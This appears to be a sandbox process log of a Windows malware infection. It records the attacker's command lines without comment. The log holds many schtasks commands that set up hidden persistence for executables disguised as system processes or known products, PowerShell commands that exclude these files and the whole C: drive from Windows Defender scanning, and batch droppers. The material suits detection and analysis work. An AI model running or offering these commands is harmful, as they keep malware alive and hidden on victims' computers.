C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\msiexec.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\MSOCache\All Users\msiexec.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\msiexec.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 7 /tr "'C:\winNet\sddsfsdf.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sddsfsdf" /sc ONLOGON /tr "'C:\winNet\sddsfsdf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 10 /tr "'C:\winNet\sddsfsdf.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\explorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Documents\My Videos\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\eHome\wininit.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Journal\fr-FR\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\msiexec.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\dwm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\sddsfsdf.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vMNJbUnSbM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
C:\winNet\ComContainerbrowserRefRuntime.exe
"C:\winNet/ComContainerbrowserRefRuntime.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9uqqWUlzO4.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
C:\DriversavessessionDlldhcp\Roblox.exe
"C:\DriversavessessionDlldhcp/Roblox.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4np3pl54\4np3pl54.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D5A.tmp" "c:\winNet\CSCA4C2121C24C74BF895E5B3D597394777.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mbi1aa25\mbi1aa25.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DE7.tmp" "c:\Program Files\Windows Journal\fr-FR\CSCD76AE30457034164B573F4B2A5893960.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lcqkwtqq\lcqkwtqq.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E54.tmp" "c:\Users\All Users\CSC95C42A624314BE78310BDEB9D835BA3.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mr1ppnnp\mr1ppnnp.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F1F.tmp" "c:\Windows\Offline Web Pages\CSCC2D5E9D23B0A48B6BC6FE4B9ECA6CC38.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cfzenaag\cfzenaag.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F6D.tmp" "c:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\CSC67F9D5D440504062ACE553C19FFDE5E4.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bsormrob\bsormrob.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8028.tmp" "c:\winNet\CSC49D7F72528124E81B41D936BF212C46B.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gjjieqlg\gjjieqlg.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8095.tmp" "c:\winNet\CSC97D079D2907144CEAE72F4F99686E3.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3ho3etse\3ho3etse.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8102.tmp" "c:\winNet\CSC3992B8FD69D44AFFAB9FE267318D8677.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iuv4z3u2\iuv4z3u2.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES816F.tmp" "c:\Users\Admin\Documents\My Videos\CSC228DE5B123194A0D88E81292314E68A3.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\isip5dhu\isip5dhu.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81CD.tmp" "c:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\CSCDD2E6DCB555746B4A413D5CFB027D2AA.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g4bqf3ev\g4bqf3ev.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8259.tmp" "c:\Program Files (x86)\Reference Assemblies\Microsoft\CSCB6ABC6A5FBFC4B328AE5916D92DC1AED.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\24qxckip\24qxckip.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82D6.tmp" "c:\Windows\Downloaded Program Files\CSCE0C07C03540D456BB3309258DBDFE59B.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tggocznb\tggocznb.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8353.tmp" "c:\Users\All Users\Microsoft\eHome\CSC1ACF99C1ED05466F84E5BBE09011CE69.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nb1h5mye\nb1h5mye.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83D0.tmp" "c:\MSOCache\All Users\CSC12ACF0B35F3F40B39BFE2C5B4089659.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dimtaqxu\dimtaqxu.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES845C.tmp" "c:\DriversavessessionDlldhcp\CSCDB0D1EC529DA4CC8A5904E3928B049D7.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tec2jh3k\tec2jh3k.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84D9.tmp" "c:\winNet\CSC50F968E876B4431CAAFB7131F4B618AD.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hu1aq3rt\hu1aq3rt.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8527.tmp" "c:\Windows\System32\CSC9B65422D45F44341A51A8E825BEAE4A.TMP"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1451802786-450524094-15654959291856616033-8165324015582428211873060891409845559"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1240033177-1087581127-52718330253047587052423637-105435632017827248901758497198"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "434171039490841803-659286136170842003317782336711507689689-864061186-1185069012"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "210418219-5002661294701329731368471238-522211457-8196399031202507616-1462984557"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NNPPtxWawv.bat"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "897362320-41934790-91102571416317546481911294881-9260774479988698511668435757"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
C:\Windows\system32\CMD.exe
"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 5 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\winNet\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\winNet\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\winNet\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\es-ES\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
